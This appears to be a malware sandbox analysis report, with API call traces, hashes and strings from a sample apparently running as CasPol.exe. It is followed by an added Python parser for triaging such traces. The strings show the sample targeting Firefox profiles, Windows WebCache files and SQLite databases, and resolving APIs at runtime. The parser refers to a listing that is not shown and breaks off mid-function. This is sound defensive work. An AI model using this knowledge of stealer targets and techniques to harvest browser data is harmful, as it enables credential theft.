• Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
• Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
• Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
• Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
• Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Strings
                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                          • API String ID: 2887208581-2114579845
                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                          • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                          • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                          • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                            • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 966727022-0
                                                                                                                                                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
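Two of the call patterns in these listings are worth pulling out mechanically rather than reading by eye: the LoadLibraryW/GetProcAddress pairing (shell32.dll resolved at run time for SHGetSpecialFolderPathW at ref 00414BA4, so the import table does not show it), and the subcall 0040E01E sequence that follows, where OpenProcess is called with access mask 00000040 (PROCESS_DUP_HANDLE), the handle is duplicated into the current process and then written through CreateFileMappingW/MapViewOfFile/WriteFile, i.e. the sample writes to a file that another process holds open. The parser below is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling; it reads the bullet lines of an "APIs" block as they appear on this page and applies those two heuristics. The rule names, the choice of which API combinations count as a match, and the sample listings (copied from the report blocks above and from the 0040E01E subcall lines) are the editor's own construction.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not report code).

Parses bullet lines such as
  • memset.MSVCRT ref: 0040E60F
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?), ref: 00414C68
into Call records and flags two patterns:
  * dynamic-import-resolution: LoadLibraryW together with GetProcAddress;
  * foreign-handle-file-write: OpenProcess with PROCESS_DUP_HANDLE, then
    DuplicateHandle, then MapViewOfFile or WriteFile on the duplicated handle.
Both rules are heuristics chosen for this example; a match is a lead, not a verdict.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

PROCESS_DUP_HANDLE = 0x40  # documented Win32 process access right

_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_?@0-9]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # as printed: 8 hex digits, a symbol name, or '?'
    ref: int                 # address of the call site
    subcall: Optional[int]   # address of the subcall that makes the call, if any


def parse_listing(text: str) -> List[Call]:
    """Return the Call records in a block; header lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(Call(
            api=m.group("api"), module=m.group("mod"),
            args=[a.strip() for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def _hex_arg(arg: str) -> Optional[int]:
    """Resolved arguments are printed as 8 hex digits; '?' or a name yields None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def find_patterns(calls: List[Call]) -> List[str]:
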